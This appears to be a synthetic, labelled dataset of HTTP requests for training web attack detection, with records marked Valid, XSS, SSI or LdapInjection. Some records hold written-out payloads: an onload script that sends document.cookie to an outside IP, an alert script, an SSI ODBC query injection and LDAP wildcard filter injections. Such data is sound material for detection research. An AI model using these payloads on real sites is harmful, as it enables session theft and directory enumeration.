GET /ZCF/aAno6neieslf8nAht/e335c2o0g.cgi?includeZy@b=whereinrmhtaccesTgau HTTP/1.1
Host: www.il7b.be
Connection: oce6hrr
Accept: application/*;q=0.2, audio/*, application/zip;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=00591
Client-ip: 99.49.237.73
Cookie: oiie=0;8Gt-2-BPbc=2096139360;n0fej0axalSuai=84629;hbtnsntr6d6H6S1=7resol)forme
Cookie2: $Version="1"
Date: Mon, 05 Jan 09 20:20:03 GMT
ETag: "E8yOpCCpYoZ09A3S2-"
Expect: 100-continue
From: 0doILoeo@uhagi7pind.be
If-Modified-Since: Fri, 30 Sep 05 22:14:00 CET
If-Unmodified-Since: Sun, 29 Feb 04 24:33:06 UTC
If-Match: *
If-None-Match: "865hT2jUjD@nE09"
If-Range: *
Max-Forwards: 632
MIME-Version: 2.4
Pragma: G5q='iTreasei'
Proxy-Authorization: Basic ZXRlc2c0OmFwaWNn
Authorization: Basic VWNlZmVtZHA6aWVocw==
Range: -6,7844-
Referer: http://sriw.net/esnaasi/Ti62unLy/ofNl0.swf
TE: gzip
Trailer: From
User-Agent: Mozilla/3.6 (compatible; MSIE 5.6; Win 9x; T8oonzasca)
UA-CPU: StrongARM
UA-Disp: 0159,402,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4314x599
Via: 0.6 www.Aestst.jpeg
Transfer-Encoding: identity
Upgrade: tden/0.3, ytuoof/6.0, Hl57r/7.7
Warning: 582 65.217.95.237 "athescdhZEt" "Fri, 04 Nov 05 16:53:44 UTC"
X-Forwarded-For: 73.229.35.89
X-Serial-Number: 52029490852983
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 221
Start - Id: 40857
class: SSI
GET /fEftg/D1.php4?goicamga=%3C%21--++%23odbc+++++connect%3D%22qea8ad%2Co5e%2Cswlno%22++++++statement%3D%22select++++*++++from+++b%22--%3E HTTP/1.0
Host: www.icopHkie5z.be:80
Connection: 2zdb8sc
Accept: image/*;q=0.7, text/plain;q=0.5
Accept-Charset: x-mac-roman;q=0.1, windows-1257;q=0.4, macintosh;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=94
Client-ip: 183.188.60.40
Cookie: vcjedwCe=trFN h0oe6dr;eh=8879;cu4cjtj=zh;tgh=da4linW;rkFeqdsrci=wzworh6twnaf
Cookie2: $Version="05"
Date: Sat, 30 Apr 05 19:19:08 UTC
ETag: "l8YqCEbciYrBlazH.KJE"
Expect: ahutgh=Zrti
From: ednaAi@brso.de
If-Modified-Since: Fri, 13 May 05 10:08:37 GMT
If-Unmodified-Since: Sun, 07 Jun 09 08:50:26 UTC
If-Match: "rLXOf-sX4kvRuBhhDZ"
If-None-Match: "AMdJCXfSuBH4qsvW2"
If-Range: *
Max-Forwards: 21
MIME-Version: 2.6
Pragma: aErmoT='na'
Proxy-Authorization: NTLM b2xRbmFjZWVwOW41c28yYWxxZUw3Um1kaXJJdXNvZW5ubHZoZGU2ZG1hZ2ls
Authorization: Basic ZmVsb2Vtcjpuc3NlZWVhbA==
Range: 662370-,944629-04,749394-
Referer: /Tg0riie/rlnot/uysn/tcdn/imlEbnst.avi
TE: trailers
Trailer: Date
User-Agent: Mozilla/9.1 (X11; U; Linux i586 5.7; aT-an; rv:4.4.1) Gecko/59196444
UA-CPU: x86
UA-Disp: 2426,7787,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: 2.9 90.244.195.150, HTTP/7.6 87.13.219.156, Hnyo/4.2 www.sikrphth.html
Transfer-Encoding: compress
Upgrade: iTdaap/8.9
Warning: 001 94.18.227.26 "tarnYgrgo4d" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40857
Start - Id: 2172
class: Valid
GET /lTvS4hsceimt/pViUtrNuptV9Y/hbhRwR@_FK9j3IWUo/eTftNiha/p4EM6TIo7Mfn2JoxCbD/qolueonuesvHafue/i-jqtaCwd54SIosl1a/elnwsyaacnoedvlsE/kD18XuMQ-wSu8mHul.swf?tDii=edscEwherewgiprocessing-instruction%7Ehy7X&1D24RH_=eVyVQSLl&ue5ui2as=437640&Hl5e20=7d2tEysnrnle&nw6=prdinw&hxhb=lhttp%5DihE3sK&U-.3C=545602&o2delete.iHDSxGF=rime812ncpseih&rahtrm=hdars2issyheiwtot&71685=%3Fdd&lt=8eecs6laly HTTP/1.1
Host: www.Nrsi.ch
Connection: qtlna
Accept: image/*
Accept-Charset: euc-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 0.98.199.59
Cookie: dlan=cnd h;ideaEu=eD
Cookie2: $Version="435"
Date: Sat, 28 Jan 06 20:03:51 UTC
ETag: "7dKcolqFrPttQt23Vf"
Expect: 100-continue
From: ertehnbl@N0seozoy.de
If-Modified-Since: Sat, 05 Aug 06 19:20:11 UTC
If-Unmodified-Since: Thu, 08 Apr 04 12:31:05 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 25 Apr 04 18:22:49 GMT
Max-Forwards: 370
MIME-Version: 3.0
Pragma: welt='jncgnAv0'
Proxy-Authorization: Digest nonce
Authorization: serds 6eyI7=n7dotze
Range: 41638-,811-3,-52756
Referer: /iaResa/0koaohm6/toiESan/1waqnea/toyv.pl
TE: trailers
Trailer: Expect
User-Agent: Mozilla/5.2 (X11; U; Unix 9.8; gp-ma; rv:6.1.6) Gecko/22784966
UA-CPU: MIPS
UA-Disp: 709,3837,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 270x992
Via: FTP/5.3 www.iyEdbmnt.png
Transfer-Encoding: identity
Upgrade: rdfol/2.1, 5cjsE/0.1
Warning: 722 4.238.114.92 "eaedoiYafssfmr6w" 
X-Forwarded-For: 130.173.148.175
X-Serial-Number: 26606464842114964
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2172
Start - Id: 10193
class: Valid
GET /oErrsouauJt.msf?s6replace._bMhve=aqF&U.Oecho2P.a7j0=%7E4S&RewesnmkH=rl%22%22+timdibody%7Ewwp-tuR&C996styleF=fJMKO&ahafuet=%3CT83ntio+Zgroup+byl&wo4=hEtnp4yqpcdnnEb6&uxw5=bglRRnidmH&RiwlTotm=717&SrlR=5age&iyttbs7qEacmho=s&rilBaa5bfLte=mbo5eabfahoarrv HTTP/1.0
Host: www.erxfcs26ks.be
Connection: hinta6
Accept: text/*;q=0.0, text/*, image/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: rdm6-f7z7, gi-io;q=0.3, Ujuy-t
Cache-Control: only-if-cached
Client-ip: 217.101.27.185
Cookie: nl=bohb6fh
Cookie2: $Version="4"
Date: Mon, 07 Dec 09 19:00:33 UTC
ETag: W/"KVsV8336Mfx0luD"
Expect: 100-continue
From: ED5c3ek@guAiepot1d.fr
If-Modified-Since: Sat, 29 Dec 07 04:54:52 UTC
If-Unmodified-Since: Mon, 02 Aug 04 11:13:03 UTC
If-Match: "E23q_zFlIqSOHp3vz"
If-None-Match: "tlOirSDtlQ4aXPJ9L"
If-Range: "b9H.rirDRjSze.Ii"
Max-Forwards: 0
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic aWRyYWQ0ZTp0NWFldmY=
Range: 066-
Referer: http://www.prfsr.uk/ehdievt/osdkn6/g0egltea.tar
TE: trailers,chunked;q=0.0
Trailer: Warning
User-Agent: Mozilla/4.3 (compatible; Konqueror/5.0; Mac OS X; ieaquchah; les1en8tts)
UA-CPU: x86
UA-Disp: 6635,0350,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 099x017
Via: leb/4.8 200.25.76.151, 4.7 www.so5ht7e.js
Transfer-Encoding: deflate
Upgrade: ins/3.6, med/5.8, ubr37/1.5, ebeas/3.0
Warning: 301 223.177.54.104 "whaoerSdnec4axPdrE" "Sun, 16 Apr 06 08:19:04 UTC"
X-Forwarded-For: 119.252.21.3
X-Serial-Number: 62709231
----: -------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 10193
Start - Id: 21178
class: Valid
GET /D9rmMnetcatagaSstyle_wp-AYW/aeoOFeeteNi9pyh7/4eachsemtaytep0cnrcr/akAQYMa-@dNoMDSzRI.png?hoStfltanec=qF9Kbt&ta=46596&k4lLinsertrNF@=7umpupdate&tsDh=eria3tNao&mht=0469767&e3teeoyradlsigi=9237&qagtkAuatao2ah2=28844758&lkeialxj9z2EeIz=01rliSelna6henOpjo&emeedetcnitb9ee=euBln&Rhgnbte8=9722071 HTTP/1.1
Host: 188.179.196.109:80
Connection: keep-alive
Accept: audio/*
Accept-Charset: x-mac-greek, x-mac-ce;q=0.7, euc-kr, hz-gb-2312
Accept-Encoding: *;q=0.8
Accept-Language: o-l, utshn4-E0hededt, bo-6wttyen, rkewbeMt-5tOhe
Cache-Control: max-stale=9876
Client-ip: 255.8.84.163
Cookie: hmombENju09Plso=eenohI;kgusaEnzidaph=7yL9;metae.L_=30938187;2octm=6;erag=glm73nwdAnuz
Cookie2: $Version="71"
Date: Wed, 22 Mar 06 20:54:55 GMT
ETag: W/"ByMYP-yrz.uN6XVkW"
Expect: 100-continue
From: aetfaus@nbciblTus.fr
If-Modified-Since: Thu, 31 May 07 16:39:27 UTC
If-Unmodified-Since: Tue, 02 Oct 07 21:47:24 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 03 Jul 08 13:21:46 UTC
Max-Forwards: 7
MIME-Version: 3.3
Pragma: vicb='T'
Proxy-Authorization: Digest cnonce="sSwzouba"
Authorization: Basic ZWV4aVI6cG1wZW1v
Range: 220-,-80,20-
Referer: http://ysth.cz/Vhatqgh/asemwb/g2Ti/hestgoh.tar
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/2.3 (compatible; 2cne; Linux i586; iaEb3tn; eeif)
UA-CPU: PowerPC
UA-Disp: 9976,202,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 402x543
Via: 7.9 197.116.221.100, HTTP/6.7 www.lahr.shtml, 2.3 57.82.16.90
Transfer-Encoding: compress
Upgrade: aoN/9.8
Warning: 796 www.shynkJe.jpeg "oinh" 
X-Forwarded-For: 208.104.152.221
X-Serial-Number: 041648335
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21178
Start - Id: 8131
class: Valid
GET /ssReyrs1dwd/Nv@@FT8Uwp-/qlsRstewr/evVNbq4cndKN/gS0Gux/n_6i95CQU1qTOUF/errU3wtxmmfb/rK.asp?EsO0id4go15r=lxH3ioeoetjen5i37&Efaymoudwoaedpn=625&tmueaasldskw=+hnph-ReTtn7rdt&vTjf92H6@Pw=uweldrnhrkine&45byoasue5a82dg=73166&mnrnrj1jeeme=dh&5JexecEFyRPqO=mOtea1s&ease=cTg+r&situ=05&OXR2=vrm4i1&Bnezsrbio=cYaY8xGE&taiseb=evnHaUTmGl HTTP/1.0
Host: www.eaSsjsad.it
Connection: n4yt
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip, gzip, gzip, gzip;q=0.1, compress
Accept-Language: oogeITce-lAins, mofaebyt-waek, 8ifrS2td-cmhyurhe;q=0.5, uOmT-ekleir;q=0.6, teiokT-f;q=0.2
Cache-Control: max-stale=6
Client-ip: 135.105.41.139
Cookie: crl=9165420;pu1sfFcIspouely=Ate
Cookie2: $Version="361"
Date: Mon, 20 Apr 09 08:31:58 GMT
ETag: W/"5a_z@8KhYS8Fiyr"
Expect: leTioh=medu;qatTb=3dblDve3
From: bHa9Ixr@cydbhep.be
If-Modified-Since: Wed, 27 Jun 07 03:53:25 UTC
If-Unmodified-Since: Sat, 15 Nov 08 12:49:00 GMT
If-Match: *
If-None-Match: "bOD-AwmCAnisI@TyJjL"
If-Range: Mon, 02 Feb 09 21:08:28 GMT
Max-Forwards: 2574
MIME-Version: 8.5
Pragma: tyEp='at9sbef'
Proxy-Authorization: Digest response="2b79C4EDCA0d95fFbDfB52b2ADbdd7C0"
Authorization: NTLM ckNyOG9lbHJjeXVUb0F1dTZybmVlZWFyZWFSSWhOb3Rkc2N3T2d0aTc=
Range: 576968-,8325-753
Referer: http://m0veen1.gov/omhil/sbas/ptpe/bt2Hhpu.php3
TE: trailers
Trailer: TE
User-Agent: esn9nsthOra
UA-CPU: StrongARM
UA-Disp: 515,5737,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 997x477
Via: q5oi/4.2 228.223.199.109:4, uIboud/9.0 63.175.253.12:81, 7.8 www.vaNolfsF.css
Transfer-Encoding: identity
Upgrade: hossa/8.6
Warning: 489 www.eptt.jpg "7ceEepaUoi6" "Mon, 12 Oct 09 20:07:00 CET"
X-Forwarded-For: 17.216.217.132
X-Serial-Number: 7042909990
----: -------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 8131
Start - Id: 6240
class: Valid
PUT /rqTu/sAzeX/.nullOXl4/doWw2bY1jqYoC/wiqtRGA4kBzzYdBF/eere/gl41mSNQKDaJrYtAqfM/jrfGeabtta/ni_MBAlmG.php3? HTTP/1.0
Content-Length: 79
Content-Language: tdisamEt
Content-Encoding: compress
Content-Location: http://www.TUftw.com/s8sveEd/ednu/hmbiin2/Ngteu.sh
Content-MD5: bHByaUp1bE9vZTJFYW9qbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Oct 04 04:10:11 CET
Last-Modified: Tue, 28 Apr 09 14:38:15 GMT
Host: www.tegn.it:094
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-greek;q=0.0, euc-jp, utf-7;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: wwdcew-vOt
Cache-Control: max-age=36
Client-ip: 227.223.120.237
Cookie: rsmfsemtqsxf8=rcn;etcaee0reront=t\sri ;UftpLlvyCm2Z=23;trrgut=torkl(dHtrcpurr;Ohpru= %re;oonwaoekulhin8n=02583
Cookie2: $Version="357"
Date: Wed, 05 May 04 14:22:13 UTC
ETag: W/"Cn3XpHcM50B17mpfc43"
Expect: tu0ero=ileumf;eraet
From: Deit2tin@frt4se8ha.be
If-Modified-Since: Thu, 10 May 07 23:50:18 UTC
If-Unmodified-Since: Sat, 24 Dec 05 02:57:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 76
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM bW9lbUFiaGVuclNqaW9vYmVXanQ0dHNkYWdpbGxqbnhlZ2FyZWVhUG1mbm1l
Authorization: Digest cnonce="so6oy"
Range: -207
Referer: http://3mnle.cz/ukith.css
TE: trailers
Trailer: If-None-Match
User-Agent: rLSfJCe- http://www.aact.fr
UA-CPU: MIPS
UA-Disp: 072,2528,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 601x2459
Via: FTP/5.4 www.ytiwn.png
Transfer-Encoding: deflate
Upgrade: uiaa/2.8
Warning: 502 www.tuiesn.jpg:49189 "yihldehotit" 
X-Forwarded-For: 108.165.196.92
X-Serial-Number: 30818494627249
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iqhbs8statspg=28313992&borXytbrtrqteo=eq&eoR7rItwsy=rlYGakCJqeD&4ro8oE3=6bVUAG6

End - Id: 6240
Start - Id: 48108
class: XSS
GET /UdMBN4C8CIxp_Bz/nXPzA73dPXwyHF7m.png?nnGhcnbchap4e8=yy%7CoC+uOgbape&r2hinoo1=016174&i2doaic6thn=lte&e6egle=dr&EDbv7OSVCdj=rfnsteode&GqEauiaonud=rlE.&en5shon9ioi=%3Cbody+++++onload%3D+++%22+%5Bwindow.open%28%27http%3A%2F%2F15.133.133.11%2Flaar.php%27%2Bdocument.cookie%29%3B%5D++++%22++%3E&ntmRzacn7yeade=comlietma&TAtimgoH=1or%40ZJGH-YI HTTP/1.1
Host: 113.225.168.2
Connection: neauweR
Accept: text/html, audio/basic
Accept-Charset: windows-1258
Accept-Encoding: 
Accept-Language: an-j6ae;q=0.9
Cache-Control: max-age=07056
Client-ip: 182.252.28.208
Cookie: MkOo0=3125565;giNqZ3xp_MS=eigroup byhttppfTriE;b7=&tBleuiacfyme;Oiseotloeamju=593;xtn=?N9stdinsmmy1linke ttgas
Cookie2: $Version="832"
Date: Thu, 17 Jul 08 13:34:31 CET
ETag: "zhoSb8pInZCHaX_c"
Expect: 1HE5r4h
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Thu, 04 Aug 05 10:38:17 GMT
If-Unmodified-Since: Wed, 06 May 09 05:49:14 GMT
If-Match: "xPb8iK-qdGXF1uL@"
If-None-Match: *
If-Range: *
Max-Forwards: 35
MIME-Version: 3.4
Pragma: s=itinahE
Proxy-Authorization: Digest realm
Authorization: NTLM SWtjbWdpQlRybm8xdW9lZTFndG51ZGZhT2k2OGN0ZUU1eW5vZQ==
Range: 223086-98
Referer: /ehgnp.js
TE: trailers
Trailer: Accept-Charset
User-Agent: odditttoeo5
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6001x2247
Via: 1.7 www.ruyxtw.css:88
Transfer-Encoding: deflate
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 69.186.228.89
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48108
Start - Id: 46474
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.1
Host: 207.183.138.212
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 209.77.63.143
Cookie: pncspr=:a;anmailautoexecnull3GX=asdeeaopEstmd4bu
Cookie2: $Version="2"
Date: Mon, 22 Oct 07 22:20:42 UTC
ETag: "TClpSRyVRpjXpah"
Expect: rtst=Irt3i;on0Inens=ets8rnl
From: oeed@ro5sY.uk
If-Modified-Since: Fri, 24 Jul 09 20:17:12 UTC
If-Unmodified-Since: Sat, 08 Sep 07 15:48:17 GMT
If-Match: *
If-None-Match: *
If-Range: "EHImig7PXy59Qtju"
Max-Forwards: 6961
Pragma: yr7s=lslO
Proxy-Authorization: Digest cnonce="eAenecin"
Authorization: NTLM N3NvQW84MDhoS2VzOGRvMmxyb3dpMzRJQWVhcGhocmVDbnNyYXJpcnluVHVlT1Rw
Range: -540
Referer: http://eennd1T.st/bieaedo/eialrP/IOar.pl
TE: deflate;q=0.6,trailers
User-Agent: Mozilla/7.0 (Machintosh; U; PPC Mac OS X 5.0; Oo-ee; rv:8.0.1) Gecko/95297250
UA-Disp: 133,558,32
UA-OS: Linux
UA-Pixels: 139x000
Via: 9.7 www.etpbcee.html
Transfer-Encoding: deflate
Upgrade: fyos/6.8, iroag/5.4, 3rX/2.7, eCy/4.0, vUar/8.3

null

End - Id: 46474
Start - Id: 36990
class: LdapInjection
GET /1m4/ekBue688/mochaopen/ta7tgoqA/ePXCCZ/otQlUgc_Tn/eehresawnonkUft/iaf.mxIFeC/.o5I9AECxCGfv/evdwiraTbanpEoltmiq.htm?znahi6kE=2&us=access_logl8S+eeprocessing-instruction%5Caxctb%28&qnldxlan=7i%24b&xIrolfDIsee=edTtRTformrtwgrotehx&zayP=3548322&bhr3aerr=+dnxWohtb&Otnwx=Tonopt%3Cl&8ee2y=%29+++%28%7C%28displayName%3Dhad*%29%28name%3Dhad*%29%28++++mail%3Dhad*%29&qtdgnSooo=7&dndo0=qllreE&otlbia2hyyt=nL2&u7neesadbgN=0183&B-jiR=%5C%25&ys=jhttelnetsystemsah&8wlre9onatEtoba=oYZM7g.k HTTP/1.0
Host: 214.52.232.151
Connection: keep-alive
Accept: audio/x-wav, image/gif;q=0.4, application/*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=8
Client-ip: 97.34.119.150
Cookie: eagjis=a6lhergsepecyi;ttgSxsmr=06839;eId=32792;ybredrayz=Teaelm0omv
Cookie2: $Version="936"
Date: Thu, 11 Dec 08 23:47:12 UTC
ETag: W/"NxJqMEpv_fMr0aSVD"
Expect: uopsnzm=AsaaoEcr
From: 4t9lsozn@n1ns8ofqic.ch
If-Modified-Since: Tue, 05 Apr 05 12:42:11 GMT
If-Unmodified-Since: Mon, 08 Jan 07 01:33:24 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 05:56:45 UTC
Max-Forwards: 6606
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic Z2ROZGI6ZGdpaQ==
Authorization: Basic aThpYWVoOlRvaXJvZQ==
Range: 84-,-422477,1197-5319
Referer: http://tuaehc.ch/ni0ta/itnq6/fptsim.fgf
TE: chunked
Trailer: Via
User-Agent: Mozilla/5.1 (Machintosh; U; Mac OS X 5.9; tc-ae; rv:5.6.9) Gecko/39412189
UA-CPU: MIPS
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 391x727
Via: aEa/0.0 183.241.29.154, 5.1 www.dsjaoa.jpg, FTP/1.4 www.aiypsR.html:4701
Transfer-Encoding: compress
Upgrade: Rtes2e/0.8, Uappi/6.8, oe526/7.2, eoop6g/8.7
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 0781389574649
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36990
Start - Id: 21694
class: Valid
GET /tnho/lrjarsn/melhs1i/be35agie1tha/epzzieonwid5/thobu4/nar/aCm3Cb/ltB/vteneea78f/ttueCmcesoghtlump0t.nsf?qeiTgh=laba4h9&ioieIifV=lt&QrVIphlW6=fufosnab%2BF%5B6uod&t5mdrnq3Etoeir=e%3Fnx&28aec=oeYtX1seesiobrafiu&5tOaynelcwz1pa=6180&LUsoro=15&vBincludeoLz=50779&hw=766512&dqotsikiEs=rLVu6yOS&zwornetcatztiVRinclude-=ini0g&45uc2a=osiaed2k&n4ymIi=36&oYyz61=sbh5t HTTP/1.1
Host: 233.14.56.13
Connection: close
Accept: image/jpeg;q=0.6
Accept-Charset: iso-8859-3;q=0.6, ks_c_5601-1987, cp-950;q=0.2, windows-1258, iso-8859-15
Accept-Encoding: 
Accept-Language: sddhmwa-ahp;q=0.9, ayl-5rTa;q=0.1
Cache-Control: max-age=229
Client-ip: 240.217.117.249
Cookie: nfZJAS=ugAaN3iBha7ZlmiM;bc=aeeo>c8htacces;fe9slN1ah0=8336207675;c6tnI5besoi=?o5
Cookie2: $Version="9"
Date: Tue, 17 Feb 04 11:52:44 GMT
ETag: W/"Dv1uMP8Hv4QitlIlBLDW"
Expect: aoSe=shro;Anls43no=Tmghoa
From: fhnah0@pcVodthnoa.com
If-Modified-Since: Sat, 21 Feb 04 12:47:09 CET
If-Unmodified-Since: Wed, 06 Apr 05 15:46:08 UTC
If-Match: "@slnfGhoht-bB.966r"
If-None-Match: *
If-Range: *
Max-Forwards: 470
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: zlkAcr cnfcci=ifhphtEe
Authorization: Basic bmxsb286bmd5cmRvbzg=
Range: 6854-805189,4305-14775
Referer: http://niow.biz/rem4mbh/kWeth9d/ey8teog.gz
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/5.5 (Machintosh; U; Mac OS X 8.6; t5-it; rv:4.9.8) Gecko/60520108
UA-CPU: StrongARM
UA-Disp: 6270,1333,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 664x378
Via: 1.9 167.17.97.162, sSuQ6n/9.0 www.8lqaD.gif
Transfer-Encoding: tnle; a6tla=itasaaj
Upgrade: Abae/9.2, 23ehie/8.6, esDl/9.5, y7tfvd/4.7, aiC/7.6
Warning: 456 16.111.210.179 "htasayeJyno" "Fri, 12 Nov 04 12:32:53 CET"
X-Forwarded-For: 36.156.86.13
X-Serial-Number: 07885
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21694
Start - Id: 37592
class: LdapInjection
POST /aQvL2N9.YN7o34g/em1lrhhjuR/i3Dawee7axtI/ps/oEsSwts9eTWQ@NSMp/dTi/iSs2ysrJ5cXjiuwG/irV0Pk6s/aadsai/IpsLb5.TtmpbK/eDnRyhtdbdfornt/leoMzQG1EvC5B2Kk3qam.msf? HTTP/1.0
Content-Length: 186
Content-Language: g
Content-Encoding: compress
Content-Location: /6sdnr3o/oeesieua.pl
Content-MD5: eXByaWFyaWlvN2llZXJyMA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 May 09 10:12:43 CET
Last-Modified: Thu, 19 Apr 07 11:35:51 CET
Host: www.elSaiie.ch
Connection: close
Accept: */*;q=0.6
Accept-Charset: isiri-3342, windows-1250;q=0.2, euc-jp;q=0.8, iso-8859-3;q=0.9, cp-950;q=0.7
Accept-Encoding: compress;q=0.8
Accept-Language: ctug-S;q=0.8, rtnjea-iatpnkg;q=0.5
Cache-Control: max-age=459
Client-ip: 56.192.77.238
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="063"
Date: Sun, 12 Mar 06 20:02:41 CET
ETag: "@QX@_ywUL101QKMd"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sat, 09 Jul 05 08:39:11 GMT
If-Unmodified-Since: Sat, 29 Oct 05 24:35:27 GMT
If-Match: "cNDMqEjUm2--epdjG64C"
If-None-Match: *
If-Range: Mon, 05 Jun 06 21:42:35 GMT
Max-Forwards: 481
MIME-Version: 4.3
Pragma: traeah='0'
Proxy-Authorization: Digest qop=Sogaol
Authorization: Basic Z2FqcnQ6b2lpMmU=
Range: 3-46,1783-444359
Referer: http://www.mmesee.st/jatoede/j2ryhale/ueertyl/inir.rar
TE: deflate;q=0.6,chunked
Trailer: Accept-Language
User-Agent: somand9e/2.7
UA-CPU: PowerPC
UA-Disp: 0007,792,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4454x553
Via: 1.3 251.12.24.108
Transfer-Encoding: gzip
Upgrade: vYs/1.2
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aea1teiosee5ry=ggsarivbeodaHf&edNviAwabssCen3=7059593&tOiu7e=hieeOtj&ae=61&oaenwutatEe=80&e9rt=8141&otiiu=)   ( |    (cn=*o    'brien*   )(mail    =*o   'brien*)   

End - Id: 37592
Start - Id: 17107
class: Valid
GET /a4sases6w/C2/jxDA202fR/poudn/b0etEstdvo8e8/dnhhvBCNU/gs3boMitbl/4U.UIGJKJgiXSobI/euAEk/T@TD1C/rTNs4ieae/4VjYaZRDPRFiF4RPV.mdb? HTTP/1.0
Host: 123.6.58.138
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.2
Cache-Control: min-fresh=5428
Client-ip: 53.27.195.117
Cookie: ineocmaS95ya=37;hithm=5
Cookie2: $Version="7"
Date: Thu, 05 Aug 04 05:48:33 CET
ETag: W/"bP5Ox600qbTCA@DWsP"
Expect: 100-continue
From: rujdrFrL@e4s1eoon.net
If-Modified-Since: Sat, 03 Jan 09 04:34:13 CET
If-Unmodified-Since: Fri, 04 Mar 05 02:05:05 CET
If-Match: *
If-None-Match: "r8gCrVQL3854auO8n"
If-Range: Fri, 23 Apr 04 13:34:32 UTC
Max-Forwards: 7771
MIME-Version: 4.7
Pragma: 7dn=nst
Proxy-Authorization: NTLM NGdydGhxaGlFZnJlZW9ub2x1ZUNzc3dubnNvUmxuZnMybWg5aTN0cjZkaXQ=
Authorization: aalr nrbms2=aq6Hnuee
Range: 0171-,862462-35
Referer: http://myreleg.gov/1bqe7aco/Puaaao/Tie2o/AeonoxY/ebezoon.avi
TE: trailers,gzip;q=0.0
Trailer: Accept
User-Agent: Mozilla/2.4 (Machintosh; U; PPC Mac OS X 5.1; ai-98; rv:2.7.5) Gecko/77288289
UA-CPU: x86
UA-Disp: 553,514,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4914x5963
Via: 1.2 170.165.1.30, Apnro/2.4 46.215.149.109, 6.7 101.188.78.178
Transfer-Encoding: gzip
Upgrade: uqn7/3.0, adaoI/9.1, aossv/2.2, skt5nb/9.3
Warning: 816 www.eedo.htm "sdali2e4bw" 
X-Forwarded-For: 22.117.12.85
X-Serial-Number: 17174419292129745419
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17107
Start - Id: 37716
class: LdapInjection
PUT /TlZ/mV8QBJ9L6YblgS6/eb.8HV/cgVrSBCNhtpassHf@YQg.cfm? HTTP/1.1
Content-Length: 179
Content-Language: orIaa,eepi
Content-Encoding: identity
Content-Location: /obkTI/iosr0teN/seeanoa8/hae6.asmx
Content-MD5: dWVhYVdpd3Nyb01sbmRycg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 25 Jan 05 06:43:18 UTC
Last-Modified: Sat, 19 Aug 06 05:39:10 CET
Host: www.uaaGC.it
Connection: nbowoIZw
Accept: application/*, image/*
Accept-Charset: windows-874, windows-1258;q=0.1, cp-932;q=0.8
